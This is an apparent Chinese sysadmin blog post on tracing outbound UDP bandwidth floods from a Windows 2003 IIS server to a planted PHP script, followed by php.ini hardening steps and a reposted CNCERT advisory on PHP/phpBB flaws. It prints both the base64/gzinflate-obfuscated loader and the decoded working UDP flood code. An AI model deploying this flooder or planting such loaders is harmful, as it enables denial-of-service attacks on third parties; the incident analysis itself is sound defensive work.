win2003遭受udp攻击,网络带宽占用大,导致网络堵塞
服务器症状:服务器带宽应用占到70-100%,网络堵塞,网站无法访问,连系统自带远程控制也连接不上!
症状分析:
⒈通过服务器“本地连接状态”可以看到,发送的字节增长速度很快(几乎10m/s),收到的字节很少!
在cmd 里用 netstat -an 查看到服务器连接的都是同一个ip ,端口都是连续的 。
根据这个可以判定不是DDOS攻击,因为DDOS是不断收到大量数据包。
⒉关闭iis,带宽过一会就正常, 可以判定是网站导致的!然后一个个网站排查(从来没有见过这样的情况,通过页面调用往外发包的)!
排查方法见:
IIS6,IIS7中查看w3wp进程:https://www.shnne.com/2014/01/40.html
⒊找到问题网站就好了,打开网站发现代码是用php写的,然后用简单的木马扫描软件扫了下,没有发现异常。
最后在网上搜索了下 “php 带宽” ,找到原因了 !
以下是摘自网络:
入侵的原理:
用户程序中的一个php页面的原代码:
/*
gl
*/
eval(gzinflate(base64_decode('
DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw
6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb
VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY
ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4
wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG
3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1
3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw
xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu
SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw
e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu
bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c
hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));
经过N次解密后的代码:
$packets = 0;
$ip = $_GET[\'ip\'];
$rand =
$_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time
= $_GET[\'time\'];
$time = time();
print \"Flooded: $ip on port $rand
\";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .=
\"X\";
}
while(1){
$packets++;
if(time() >
$max_time){
break;
}
$fp = fsockopen(\"udp://$ip\", $rand, $errno,
$errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo
\"Packet complete at \".time(\'h:i:s\').\" with $packets (\" .
round(($packets*65)/1024, 2) . \" mB) packets averaging \".
round($packets/$exec_time, 2) . \" packets/s \\n\";
?>
工作原理:
通过url传递IP和端口以udp的方式打开.传递文件到服务器写出。
解决方法:
在c:\windows\php.ini里设置:
disable_functions =gzinflate;
在c:\windows\php.ini里设其值为Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
前面的;号要保留
然后重启IIS
如果设置了问题还没有解决,可以尝试把udp端口关闭 !
IPSEC设置(关闭udp)文档下载地址:
http://
相关公告:
警惕利用PHP漏洞的网页篡改和攻击
1月11日,CNCERT/CC收到韩国KrCERT/CC的事件报告称,韩国最近大量发生的网页篡改事件源于PHP网页公告板漏洞,并提醒Web应用的用户尽快安装补丁采取措施进行防范。鉴于PHP网页公告板是各类网站的常用服务程序,因此,国内的网站同样会受到漏洞的威胁。
据KrCERT/CC消息,从2004年12月28日至2005年1月4日,韩国有2300多个首页被篡改,很多主页都被托管在IDC中的同一台服务器上。通常一台网页托管服务器可托管成百上千个首页(网站),如果一个首页有漏洞,则服务器中的其它首页都会受到影响。在KrCERT/CC提供的案例中,很多被篡改网页使用了韩国本土开发的开放源码公告板应用程序。
CNCERT/CC正在关注此类事件的发展,如果您遇到与此有关的网页篡改事件,请及时向CNCERT/CC报告。
受影响的平台:
PHP
4.3.x
PHP 5.0.x
phpBB
2.0.x
更多开放源码的PHP应用程序均可能受到影响
解决方案:
建议及时安装补丁。
针对phpBB,建议升级至2.0.11及以后版本,补丁下载地址:
http://www.phpbb.com/downloads.php
针对PHP,建议升级至4.3.10或5.0.3及以后版本,补丁下载地址:
http://www.php.net/downloads.php
另外,可做一些安全设置如下:
-------------------------------http://www.rekfan.com----------------------------------
*
如果网站不需要远程页面操作,可关闭allow-url_fopen选项,禁止URL被作为一个文件;
*
关闭register_globals选项,禁止输入变量被用作WEB服务器上的一个全球变量(除非有特定程序需要全球变量);
*
建议关闭display_errors选项,禁止向客户端显示任何消息。甚至PHP起始页错误选项也可以关闭;
*
但log_errors选项需要保留。
总之,网站管理员需要关注系统漏洞和安全补丁,做好安全设置,对于由用户自行维护的网页也要警惕。特别是BBS服务,最好不要让用户安装自己的BBS,而是由IDC或托管服务商提供经过安全配置的BBS服务。另外,将BBS系统用独立的服务器运行也是安全措施之一。启用日志服务有助于一旦事件发生后的调查工作。